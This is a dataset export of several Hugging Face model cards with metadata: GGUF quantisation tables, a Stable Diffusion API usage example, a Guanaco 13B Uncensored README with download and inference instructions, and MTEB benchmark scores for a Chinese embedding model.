| [numfalm_v2-1b.Q4_0.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q4_0.gguf) | Q4_0 | 0.75GB |
| [numfalm_v2-1b.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.IQ4_NL.gguf) | IQ4_NL | 0.76GB |
| [numfalm_v2-1b.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q4_K_S.gguf) | Q4_K_S | 0.79GB |
| [numfalm_v2-1b.Q4_K.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q4_K.gguf) | Q4_K | 0.83GB |
| [numfalm_v2-1b.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q4_K_M.gguf) | Q4_K_M | 0.83GB |
| [numfalm_v2-1b.Q4_1.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q4_1.gguf) | Q4_1 | 0.83GB |
| [numfalm_v2-1b.Q5_0.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q5_0.gguf) | Q5_0 | 0.9GB |
| [numfalm_v2-1b.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q5_K_S.gguf) | Q5_K_S | 0.91GB |
| [numfalm_v2-1b.Q5_K.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q5_K.gguf) | Q5_K | 0.95GB |
| [numfalm_v2-1b.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q5_K_M.gguf) | Q5_K_M | 0.95GB |
| [numfalm_v2-1b.Q5_1.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q5_1.gguf) | Q5_1 | 0.97GB |
| [numfalm_v2-1b.Q6_K.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q6_K.gguf) | Q6_K | 1.11GB |
| [numfalm_v2-1b.Q8_0.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q8_0.gguf) | Q8_0 | 1.36GB |
Original model description:
---
license: apache-2.0
language:
- en
- th
library_name: transformers
pipeline_tag: text-generation
---
# NumFa v2 (1B)
NumFa v2 1B is a pretrained LLM with 1B parameters.
Base model: TinyLLama
**For testing only**
## Model Details
### Model Description
The model was trained on TPU.
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** NumFa
- **Model type:** text-generation
- **Language(s) (NLP):** English
- **License:** apache-2.0
### Out-of-Scope Use
Math, coding, and other languages.
## Bias, Risks, and Limitations
The model can have biases from its dataset. Use at your own risk!
## How to Get Started with the Model
Use the code below to get started with the model.
**Example**
```python
# !pip install accelerate sentencepiece transformers bitsandbytes
import torch
from transformers import pipeline
pipe = pipeline("text-generation", model="numfa/numfa_v2-1b", torch_dtype=torch.bfloat16, device_map="auto")
# Plain text-generation call; the sampling parameters below are only an example
outputs = pipe("test is", max_new_tokens=300, do_sample=True, temperature=0.9, top_k=50, top_p=0.95, no_repeat_ngram_size=2,typical_p=1.)
print(outputs[0]["generated_text"])
```
|
stablediffusionapi/disney-pixar-cartoon | stablediffusionapi | "2023-07-12T15:29:05Z" | 3,596 | 29 | diffusers | [
"diffusers",
"stablediffusionapi.com",
"stable-diffusion-api",
"text-to-image",
"ultra-realistic",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2023-07-12T15:26:19Z" | ---
license: creativeml-openrail-m
tags:
- stablediffusionapi.com
- stable-diffusion-api
- text-to-image
- ultra-realistic
pinned: true
---
# Disney Pixar Cartoon type B API Inference

## Get API Key
Get an API key from [Stable Diffusion API](http://stablediffusionapi.com/); no payment needed.
Replace the key in the code below and change **model_id** to "disney-pixar-cartoon".
Coding in PHP/Node/Java etc.? Have a look at the docs for more code examples: [View docs](https://stablediffusionapi.com/docs)
Try model for free: [Generate Images](https://stablediffusionapi.com/models/disney-pixar-cartoon)
Model link: [View model](https://stablediffusionapi.com/models/disney-pixar-cartoon)
Credits: [View credits](https://civitai.com/?query=Disney%20Pixar%20Cartoon%20type%20B)
View all models: [View Models](https://stablediffusionapi.com/models)
```python
import requests
import json
url = "https://stablediffusionapi.com/api/v3/dreambooth"
payload = json.dumps({
"key": "your_api_key",
"model_id": "disney-pixar-cartoon",
"prompt": "ultra realistic close up portrait ((beautiful pale cyberpunk female with heavy black eyeliner)), blue eyes, shaved side haircut, hyper detail, cinematic lighting, magic neon, dark red city, Canon EOS R3, nikon, f/1.4, ISO 200, 1/160s, 8K, RAW, unedited, symmetrical balance, in-frame, 8K",
"negative_prompt": "painting, extra fingers, mutated hands, poorly drawn hands, poorly drawn face, deformed, ugly, blurry, bad anatomy, bad proportions, extra limbs, cloned face, skinny, glitchy, double torso, extra arms, extra hands, mangled fingers, missing lips, ugly face, distorted face, extra legs, anime",
"width": "512",
"height": "512",
"samples": "1",
"num_inference_steps": "30",
"safety_checker": "no",
"enhance_prompt": "yes",
"seed": None,
"guidance_scale": 7.5,
"multi_lingual": "no",
"panorama": "no",
"self_attention": "no",
"upscale": "no",
"embeddings": "embeddings_model_id",
"lora": "lora_model_id",
"webhook": None,
"track_id": None
})
headers = {
'Content-Type': 'application/json'
}
response = requests.request("POST", url, headers=headers, data=payload)
print(response.text)
```
> Use this coupon code to get 25% off **DMGG0RBN** |
TheBloke/Guanaco-13B-Uncensored-GGUF | TheBloke | "2023-09-27T12:48:28Z" | 3,592 | 29 | transformers | [
"transformers",
"gguf",
"llama",
"conversational",
"en",
"dataset:Fredithefish/openassistant-guanaco-unfiltered",
"base_model:Fredithefish/Guanaco-13B-Uncensored",
"license:apache-2.0",
"text-generation-inference",
"region:us"
] | text-generation | "2023-09-08T08:03:08Z" | ---
language:
- en
license: apache-2.0
library_name: transformers
datasets:
- Fredithefish/openassistant-guanaco-unfiltered
model_name: Guanaco 13B Uncensored
base_model: Fredithefish/Guanaco-13B-Uncensored
inference: false
model_creator: Fredithefish
model_type: llama
pipeline_tag: conversational
prompt_template: '### Human: {prompt}
### Assistant:
'
quantized_by: TheBloke
---
<!-- header start -->
<!-- 200823 -->
<div style="width: auto; margin-left: auto; margin-right: auto">
<img src="https://i.imgur.com/EBdldam.jpg" alt="TheBlokeAI" style="width: 100%; min-width: 400px; display: block; margin: auto;">
</div>
<div style="display: flex; justify-content: space-between; width: 100%;">
<div style="display: flex; flex-direction: column; align-items: flex-start;">
<p style="margin-top: 0.5em; margin-bottom: 0em;"><a href="https://discord.gg/theblokeai">Chat & support: TheBloke's Discord server</a></p>
</div>
<div style="display: flex; flex-direction: column; align-items: flex-end;">
<p style="margin-top: 0.5em; margin-bottom: 0em;"><a href="https://www.patreon.com/TheBlokeAI">Want to contribute? TheBloke's Patreon page</a></p>
</div>
</div>
<div style="text-align:center; margin-top: 0em; margin-bottom: 0em"><p style="margin-top: 0.25em; margin-bottom: 0em;">TheBloke's LLM work is generously supported by a grant from <a href="https://a16z.com">andreessen horowitz (a16z)</a></p></div>
<hr style="margin-top: 1.0em; margin-bottom: 1.0em;">
<!-- header end -->
# Guanaco 13B Uncensored - GGUF
- Model creator: [Fredithefish](https://huggingface.co/Fredithefish)
- Original model: [Guanaco 13B Uncensored](https://huggingface.co/Fredithefish/Guanaco-13B-Uncensored)
<!-- description start -->
## Description
This repo contains GGUF format model files for [Fredithefish's Guanaco 13B Uncensored](https://huggingface.co/Fredithefish/Guanaco-13B-Uncensored).
<!-- description end -->
<!-- README_GGUF.md-about-gguf start -->
### About GGUF
GGUF is a new format introduced by the llama.cpp team on August 21st 2023. It is a replacement for GGML, which is no longer supported by llama.cpp. GGUF offers numerous advantages over GGML, such as better tokenisation and support for special tokens. It also supports metadata, and is designed to be extensible.
Here is an incomplete list of clients and libraries that are known to support GGUF:
* [llama.cpp](https://github.com/ggerganov/llama.cpp). The source project for GGUF. Offers a CLI and a server option.
* [text-generation-webui](https://github.com/oobabooga/text-generation-webui), the most widely used web UI, with many features and powerful extensions. Supports GPU acceleration.
* [KoboldCpp](https://github.com/LostRuins/koboldcpp), a fully featured web UI, with GPU accel across all platforms and GPU architectures. Especially good for story telling.
* [LM Studio](https://lmstudio.ai/), an easy-to-use and powerful local GUI for Windows and macOS (Silicon), with GPU acceleration.
* [LoLLMS Web UI](https://github.com/ParisNeo/lollms-webui), a great web UI with many interesting and unique features, including a full model library for easy model selection.
* [Faraday.dev](https://faraday.dev/), an attractive and easy to use character-based chat GUI for Windows and macOS (both Silicon and Intel), with GPU acceleration.
* [ctransformers](https://github.com/marella/ctransformers), a Python library with GPU accel, LangChain support, and OpenAI-compatible AI server.
* [llama-cpp-python](https://github.com/abetlen/llama-cpp-python), a Python library with GPU accel, LangChain support, and OpenAI-compatible API server.
* [candle](https://github.com/huggingface/candle), a Rust ML framework with a focus on performance, including GPU support, and ease of use.
<!-- README_GGUF.md-about-gguf end -->
<!-- repositories-available start -->
## Repositories available
* [AWQ model(s) for GPU inference.](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-AWQ)
* [GPTQ models for GPU inference, with multiple quantisation parameter options.](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GPTQ)
* [2, 3, 4, 5, 6 and 8-bit GGUF models for CPU+GPU inference](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF)
* [Fredithefish's original unquantised fp16 model in pytorch format, for GPU inference and for further conversions](https://huggingface.co/Fredithefish/Guanaco-13B-Uncensored)
<!-- repositories-available end -->
<!-- prompt-template start -->
## Prompt template: Guanaco
```
### Human: {prompt}
### Assistant:
```
<!-- prompt-template end -->
<!-- licensing start -->
## Licensing
The creator of the source model has listed its license as `apache-2.0`, and this quantization has therefore used that same license.
As this model is based on Llama 2, it is also subject to the Meta Llama 2 license terms, and the license files for that are additionally included. It should therefore be considered as being claimed to be licensed under both licenses. I contacted Hugging Face for clarification on dual licensing but they do not yet have an official position. Should this change, or should Meta provide any feedback on this situation, I will update this section accordingly.
In the meantime, any questions regarding licensing, and in particular how these two licenses might interact, should be directed to the original model repository: [Fredithefish's Guanaco 13B Uncensored](https://huggingface.co/Fredithefish/Guanaco-13B-Uncensored).
<!-- licensing end -->
<!-- compatibility_gguf start -->
## Compatibility
These quantised GGUFv2 files are compatible with llama.cpp from August 27th onwards, as of commit [d0cee0d36d5be95a0d9088b674dbb27354107221](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221)
They are also compatible with many third party UIs and libraries - please see the list at the top of this README.
## Explanation of quantisation methods
<details>
<summary>Click to see details</summary>
The new methods available are:
* GGML_TYPE_Q2_K - "type-1" 2-bit quantization in super-blocks containing 16 blocks, each block having 16 weight. Block scales and mins are quantized with 4 bits. This ends up effectively using 2.5625 bits per weight (bpw)
* GGML_TYPE_Q3_K - "type-0" 3-bit quantization in super-blocks containing 16 blocks, each block having 16 weights. Scales are quantized with 6 bits. This end up using 3.4375 bpw.
* GGML_TYPE_Q4_K - "type-1" 4-bit quantization in super-blocks containing 8 blocks, each block having 32 weights. Scales and mins are quantized with 6 bits. This ends up using 4.5 bpw.
* GGML_TYPE_Q5_K - "type-1" 5-bit quantization. Same super-block structure as GGML_TYPE_Q4_K resulting in 5.5 bpw
* GGML_TYPE_Q6_K - "type-0" 6-bit quantization. Super-blocks with 16 blocks, each block having 16 weights. Scales are quantized with 8 bits. This ends up using 6.5625 bpw
Refer to the Provided Files table below to see what files use which methods, and how.
</details>
<!-- compatibility_gguf end -->
<!-- README_GGUF.md-provided-files start -->
## Provided files
| Name | Quant method | Bits | Size | Max RAM required | Use case |
| ---- | ---- | ---- | ---- | ---- | ----- |
| [guanaco-13b-uncensored.Q2_K.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q2_K.gguf) | Q2_K | 2 | 5.43 GB| 7.93 GB | smallest, significant quality loss - not recommended for most purposes |
| [guanaco-13b-uncensored.Q3_K_S.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q3_K_S.gguf) | Q3_K_S | 3 | 5.66 GB| 8.16 GB | very small, high quality loss |
| [guanaco-13b-uncensored.Q3_K_M.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q3_K_M.gguf) | Q3_K_M | 3 | 6.34 GB| 8.84 GB | very small, high quality loss |
| [guanaco-13b-uncensored.Q3_K_L.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q3_K_L.gguf) | Q3_K_L | 3 | 6.93 GB| 9.43 GB | small, substantial quality loss |
| [guanaco-13b-uncensored.Q4_0.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q4_0.gguf) | Q4_0 | 4 | 7.37 GB| 9.87 GB | legacy; small, very high quality loss - prefer using Q3_K_M |
| [guanaco-13b-uncensored.Q4_K_S.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q4_K_S.gguf) | Q4_K_S | 4 | 7.41 GB| 9.91 GB | small, greater quality loss |
| [guanaco-13b-uncensored.Q4_K_M.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q4_K_M.gguf) | Q4_K_M | 4 | 7.87 GB| 10.37 GB | medium, balanced quality - recommended |
| [guanaco-13b-uncensored.Q5_0.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q5_0.gguf) | Q5_0 | 5 | 8.97 GB| 11.47 GB | legacy; medium, balanced quality - prefer using Q4_K_M |
| [guanaco-13b-uncensored.Q5_K_S.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q5_K_S.gguf) | Q5_K_S | 5 | 8.97 GB| 11.47 GB | large, low quality loss - recommended |
| [guanaco-13b-uncensored.Q5_K_M.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q5_K_M.gguf) | Q5_K_M | 5 | 9.23 GB| 11.73 GB | large, very low quality loss - recommended |
| [guanaco-13b-uncensored.Q6_K.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q6_K.gguf) | Q6_K | 6 | 10.68 GB| 13.18 GB | very large, extremely low quality loss |
| [guanaco-13b-uncensored.Q8_0.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q8_0.gguf) | Q8_0 | 8 | 13.83 GB| 16.33 GB | very large, extremely low quality loss - not recommended |
**Note**: the above RAM figures assume no GPU offloading. If layers are offloaded to the GPU, this will reduce RAM usage and use VRAM instead.
<!-- README_GGUF.md-provided-files end -->
<!-- README_GGUF.md-how-to-download start -->
## How to download GGUF files
**Note for manual downloaders:** You almost never want to clone the entire repo! Multiple different quantisation formats are provided, and most users only want to pick and download a single file.
The following clients/libraries will automatically download models for you, providing a list of available models to choose from:
- LM Studio
- LoLLMS Web UI
- Faraday.dev
### In `text-generation-webui`
Under Download Model, you can enter the model repo: TheBloke/Guanaco-13B-Uncensored-GGUF and, below it, a specific filename to download, such as: guanaco-13b-uncensored.Q4_K_M.gguf.
Then click Download.
### On the command line, including multiple files at once
I recommend using the `huggingface-hub` Python library:
```shell
pip3 install 'huggingface-hub>=0.17.1'
```
Then you can download any individual model file to the current directory, at high speed, with a command like this:
```shell
huggingface-cli download TheBloke/Guanaco-13B-Uncensored-GGUF guanaco-13b-uncensored.Q4_K_M.gguf --local-dir . --local-dir-use-symlinks False
```
<details>
<summary>More advanced huggingface-cli download usage</summary>
You can also download multiple files at once with a pattern:
```shell
huggingface-cli download TheBloke/Guanaco-13B-Uncensored-GGUF --local-dir . --local-dir-use-symlinks False --include='*Q4_K*gguf'
```
For more documentation on downloading with `huggingface-cli`, please see: [HF -> Hub Python Library -> Download files -> Download from the CLI](https://huggingface.co/docs/huggingface_hub/guides/download#download-from-the-cli).
To accelerate downloads on fast connections (1Gbit/s or higher), install `hf_transfer`:
```shell
pip3 install hf_transfer
```
And set environment variable `HF_HUB_ENABLE_HF_TRANSFER` to `1`:
```shell
HUGGINGFACE_HUB_ENABLE_HF_TRANSFER=1 huggingface-cli download TheBloke/Guanaco-13B-Uncensored-GGUF guanaco-13b-uncensored.Q4_K_M.gguf --local-dir . --local-dir-use-symlinks False
```
Windows CLI users: Use `set HUGGINGFACE_HUB_ENABLE_HF_TRANSFER=1` before running the download command.
</details>
<!-- README_GGUF.md-how-to-download end -->
<!-- README_GGUF.md-how-to-run start -->
## Example `llama.cpp` command
Make sure you are using `llama.cpp` from commit [d0cee0d36d5be95a0d9088b674dbb27354107221](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221) or later.
```shell
./main -ngl 32 -m guanaco-13b-uncensored.Q4_K_M.gguf --color -c 4096 --temp 0.7 --repeat_penalty 1.1 -n -1 -p "### Human: {prompt}\n### Assistant:"
```
Change `-ngl 32` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.
Change `-c 4096` to the desired sequence length. For extended sequence models - eg 8K, 16K, 32K - the necessary RoPE scaling parameters are read from the GGUF file and set by llama.cpp automatically.
If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`
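For example, the same command in interactive instruction mode:
```shell
./main -ngl 32 -m guanaco-13b-uncensored.Q4_K_M.gguf --color -c 4096 --temp 0.7 --repeat_penalty 1.1 -n -1 -i -ins
```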
For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md)
## How to run in `text-generation-webui`
Further instructions here: [text-generation-webui/docs/llama.cpp.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/llama.cpp.md).
## How to run from Python code
You can use GGUF models from Python using the [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) or [ctransformers](https://github.com/marella/ctransformers) libraries.
### How to load this model from Python using ctransformers
#### First install the package
```bash
# Base ctransformers with no GPU acceleration
pip install 'ctransformers>=0.2.24'
# Or with CUDA GPU acceleration
pip install 'ctransformers[cuda]>=0.2.24'
# Or with ROCm GPU acceleration
CT_HIPBLAS=1 pip install 'ctransformers>=0.2.24' --no-binary ctransformers
# Or with Metal GPU acceleration for macOS systems
CT_METAL=1 pip install 'ctransformers>=0.2.24' --no-binary ctransformers
```
#### Simple example code to load one of these GGUF models
```python
from ctransformers import AutoModelForCausalLM
# Set gpu_layers to the number of layers to offload to GPU. Set to 0 if no GPU acceleration is available on your system.
llm = AutoModelForCausalLM.from_pretrained("TheBloke/Guanaco-13B-Uncensored-GGUF", model_file="guanaco-13b-uncensored.Q4_K_M.gguf", model_type="llama", gpu_layers=50)
print(llm("AI is going to"))
```
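If you prefer `llama-cpp-python`, here is a minimal sketch along the same lines (the GPU layer count, context size and prompt are illustrative; adjust them for your hardware):
```python
from llama_cpp import Llama

# Set n_gpu_layers to the number of layers to offload to GPU; use 0 for CPU-only inference.
llm = Llama(model_path="./guanaco-13b-uncensored.Q4_K_M.gguf", n_ctx=4096, n_gpu_layers=32)

output = llm("### Human: Tell me about llamas.\n### Assistant:", max_tokens=256, stop=["### Human:"])
print(output["choices"][0]["text"])
```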
## How to use with LangChain
Here are guides on using llama-cpp-python or ctransformers with LangChain:
* [LangChain + llama-cpp-python](https://python.langchain.com/docs/integrations/llms/llamacpp)
* [LangChain + ctransformers](https://python.langchain.com/docs/integrations/providers/ctransformers)
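As a rough sketch of the llama-cpp-python route with LangChain (parameter values are illustrative, not tuned):
```python
from langchain.llms import LlamaCpp

llm = LlamaCpp(
    model_path="./guanaco-13b-uncensored.Q4_K_M.gguf",
    n_ctx=4096,        # context length
    n_gpu_layers=32,   # layers to offload to GPU; set to 0 for CPU-only
    temperature=0.7,
)

print(llm("### Human: Tell me about llamas.\n### Assistant:"))
```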
<!-- README_GGUF.md-how-to-run end -->
<!-- footer start -->
<!-- 200823 -->
## Discord
For further support, and discussions on these models and AI in general, join us at:
[TheBloke AI's Discord server](https://discord.gg/theblokeai)
## Thanks, and how to contribute
Thanks to the [chirper.ai](https://chirper.ai) team!
Thanks to Clay from [gpus.llm-utils.org](https://gpus.llm-utils.org)!
I've had a lot of people ask if they can contribute. I enjoy providing models and helping people, and would love to be able to spend even more time doing it, as well as expanding into new projects like fine tuning/training.
If you're able and willing to contribute it will be most gratefully received and will help me to keep providing more models, and to start work on new AI projects.
Donaters will get priority support on any and all AI/LLM/model questions and requests, access to a private Discord room, plus other benefits.
* Patreon: https://patreon.com/TheBlokeAI
* Ko-Fi: https://ko-fi.com/TheBlokeAI
**Special thanks to**: Aemon Algiz.
**Patreon special mentions**: Alicia Loh, Stephen Murray, K, Ajan Kanaga, RoA, Magnesian, Deo Leter, Olakabola, Eugene Pentland, zynix, Deep Realms, Raymond Fosdick, Elijah Stavena, Iucharbius, Erik Bjäreholt, Luis Javier Navarrete Lozano, Nicholas, theTransient, John Detwiler, alfie_i, knownsqashed, Mano Prime, Willem Michiel, Enrico Ros, LangChain4j, OG, Michael Dempsey, Pierre Kircher, Pedro Madruga, James Bentley, Thomas Belote, Luke @flexchar, Leonard Tan, Johann-Peter Hartmann, Illia Dulskyi, Fen Risland, Chadd, S_X, Jeff Scroggin, Ken Nordquist, Sean Connelly, Artur Olbinski, Swaroop Kallakuri, Jack West, Ai Maven, David Ziegler, Russ Johnson, transmissions 11, John Villwock, Alps Aficionado, Clay Pascal, Viktor Bowallius, Subspace Studios, Rainer Wilmers, Trenton Dambrowitz, vamX, Michael Levine, 준교 김, Brandon Frisco, Kalila, Trailburnt, Randy H, Talal Aujan, Nathan Dryer, Vadim, 阿明, ReadyPlayerEmma, Tiffany J. Kim, George Stoitzev, Spencer Kim, Jerry Meng, Gabriel Tamborski, Cory Kujawski, Jeffrey Morgan, Spiking Neurons AB, Edmond Seymore, Alexandros Triantafyllidis, Lone Striker, Cap'n Zoog, Nikolai Manek, danny, ya boyyy, Derek Yates, usrbinkat, Mandus, TL, Nathan LeClaire, subjectnull, Imad Khwaja, webtim, Raven Klaugh, Asp the Wyvern, Gabriel Puliatti, Caitlyn Gatomon, Joseph William Delisle, Jonathan Leane, Luke Pendergrass, SuperWojo, Sebastain Graf, Will Dee, Fred von Graf, Andrey, Dan Guido, Daniel P. Andersen, Nitin Borwankar, Elle, Vitor Caleffi, biorpg, jjj, NimbleBox.ai, Pieter, Matthew Berman, terasurfer, Michael Davis, Alex, Stanislav Ovsiannikov
Thank you to all my generous patrons and donaters!
And thank you again to a16z for their generous grant.
<!-- footer end -->
<!-- original-model-card start -->
# Original model card: Fredithefish's Guanaco 13B Uncensored
<img src="https://huggingface.co/Fredithefish/Guanaco-3B-Uncensored/resolve/main/Guanaco-Uncensored.jpg" alt="Alt Text" width="295"/>
# ✨ Guanaco - 13B - Uncensored ✨
Guanaco-13B-Uncensored has been fine-tuned for 4 epochs on the [Unfiltered Guanaco Dataset](https://huggingface.co/datasets/Fredithefish/openassistant-guanaco-unfiltered) using [Llama-2-13B](https://hf.co/meta-llama/Llama-2-13b-hf) as the base model.
<br>The model does not perform well with languages other than English.
<br>Please note: This model is designed to provide responses without content filtering or censorship. It generates answers without denials.
## Special thanks
I would like to thank AutoMeta for providing me with the computing power necessary to train this model.
Also thanks to TheBloke for creating [the GGUF](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF) and [the GPTQ](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GPTQ) quantizations for this model.
### Prompt Template
```
### Human: {prompt} ### Assistant:
```
### Dataset
The model has been fine-tuned on the V2 of the Guanaco unfiltered dataset.
<!-- original-model-card end -->
|
infgrad/stella-mrl-large-zh-v3.5-1792d | infgrad | "2024-06-13T04:44:44Z" | 3,589 | 39 | sentence-transformers | [
"sentence-transformers",
"pytorch",
"bert",
"feature-extraction",
"sentence-similarity",
"mteb",
"arxiv:2205.13147",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | sentence-similarity | "2024-02-27T09:48:21Z" | ---
pipeline_tag: sentence-similarity
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- mteb
model-index:
- name: stella-mrl-large-zh-v3.5-1792d
results:
- task:
type: STS
dataset:
type: C-MTEB/AFQMC
name: MTEB AFQMC
config: default
split: validation
revision: None
metrics:
- type: cos_sim_pearson
value: 54.33822814973567
- type: cos_sim_spearman
value: 58.85457316132848
- type: euclidean_pearson
value: 57.57048145477383
- type: euclidean_spearman
value: 58.854593263425095
- type: manhattan_pearson
value: 57.55884028558309
- type: manhattan_spearman
value: 58.84474216217465
- task:
type: STS
dataset:
type: C-MTEB/ATEC
name: MTEB ATEC
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 54.219652875381875
- type: cos_sim_spearman
value: 58.079506691583546
- type: euclidean_pearson
value: 61.646366330471736
- type: euclidean_spearman
value: 58.07951006894859
- type: manhattan_pearson
value: 61.64460832085762
- type: manhattan_spearman
value: 58.08054699349972
- task:
type: Classification
dataset:
type: mteb/amazon_reviews_multi
name: MTEB AmazonReviewsClassification (zh)
config: zh
split: test
revision: 1399c76144fd37290681b995c656ef9b2e06e26d
metrics:
- type: accuracy
value: 46.593999999999994
- type: f1
value: 44.73150848183217
- task:
type: STS
dataset:
type: C-MTEB/BQ
name: MTEB BQ
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 69.16841007040091
- type: cos_sim_spearman
value: 71.04760904227217
- type: euclidean_pearson
value: 69.95126084376611
- type: euclidean_spearman
value: 71.04760904184589
- type: manhattan_pearson
value: 69.92512024129407
- type: manhattan_spearman
value: 71.02613161257672
- task:
type: Clustering
dataset:
type: C-MTEB/CLSClusteringP2P
name: MTEB CLSClusteringP2P
config: default
split: test
revision: None
metrics:
- type: v_measure
value: 43.032332399653306
- task:
type: Clustering
dataset:
type: C-MTEB/CLSClusteringS2S
name: MTEB CLSClusteringS2S
config: default
split: test
revision: None
metrics:
- type: v_measure
value: 40.41603958793544
- task:
type: Reranking
dataset:
type: C-MTEB/CMedQAv1-reranking
name: MTEB CMedQAv1
config: default
split: test
revision: None
metrics:
- type: map
value: 89.33487924447584
- type: mrr
value: 91.34623015873017
- task:
type: Reranking
dataset:
type: C-MTEB/CMedQAv2-reranking
name: MTEB CMedQAv2
config: default
split: test
revision: None
metrics:
- type: map
value: 89.17795270698021
- type: mrr
value: 91.0956746031746
- task:
type: Retrieval
dataset:
type: C-MTEB/CmedqaRetrieval
name: MTEB CmedqaRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 26.809
- type: map_at_10
value: 39.906000000000006
- type: map_at_100
value: 41.858000000000004
- type: map_at_1000
value: 41.954
- type: map_at_3
value: 35.435
- type: map_at_5
value: 37.978
- type: mrr_at_1
value: 40.660000000000004
- type: mrr_at_10
value: 48.787000000000006
- type: mrr_at_100
value: 49.796
- type: mrr_at_1000
value: 49.832
- type: mrr_at_3
value: 46.166000000000004
- type: mrr_at_5
value: 47.675
- type: ndcg_at_1
value: 40.660000000000004
- type: ndcg_at_10
value: 46.614
- type: ndcg_at_100
value: 54.037
- type: ndcg_at_1000
value: 55.654
- type: ndcg_at_3
value: 41.032000000000004
- type: ndcg_at_5
value: 43.464999999999996
- type: precision_at_1
value: 40.660000000000004
- type: precision_at_10
value: 10.35
- type: precision_at_100
value: 1.6340000000000001
- type: precision_at_1000
value: 0.184
- type: precision_at_3
value: 23.122
- type: precision_at_5
value: 16.944
- type: recall_at_1
value: 26.809
- type: recall_at_10
value: 57.474000000000004
- type: recall_at_100
value: 87.976
- type: recall_at_1000
value: 98.74199999999999
- type: recall_at_3
value: 40.819
- type: recall_at_5
value: 48.175000000000004
- task:
type: PairClassification
dataset:
type: C-MTEB/CMNLI
name: MTEB Cmnli
config: default
split: validation
revision: None
metrics:
- type: cos_sim_accuracy
value: 83.4996993385448
- type: cos_sim_ap
value: 90.66238348446467
- type: cos_sim_f1
value: 84.39077936333699
- type: cos_sim_precision
value: 79.53651975998345
- type: cos_sim_recall
value: 89.87608136544307
- type: dot_accuracy
value: 83.4996993385448
- type: dot_ap
value: 90.64660919236363
- type: dot_f1
value: 84.39077936333699
- type: dot_precision
value: 79.53651975998345
- type: dot_recall
value: 89.87608136544307
- type: euclidean_accuracy
value: 83.4996993385448
- type: euclidean_ap
value: 90.66238269557765
- type: euclidean_f1
value: 84.39077936333699
- type: euclidean_precision
value: 79.53651975998345
- type: euclidean_recall
value: 89.87608136544307
- type: manhattan_accuracy
value: 83.35538184004811
- type: manhattan_ap
value: 90.6446013420276
- type: manhattan_f1
value: 84.37465196569775
- type: manhattan_precision
value: 80.5614632071459
- type: manhattan_recall
value: 88.56675239653963
- type: max_accuracy
value: 83.4996993385448
- type: max_ap
value: 90.66238348446467
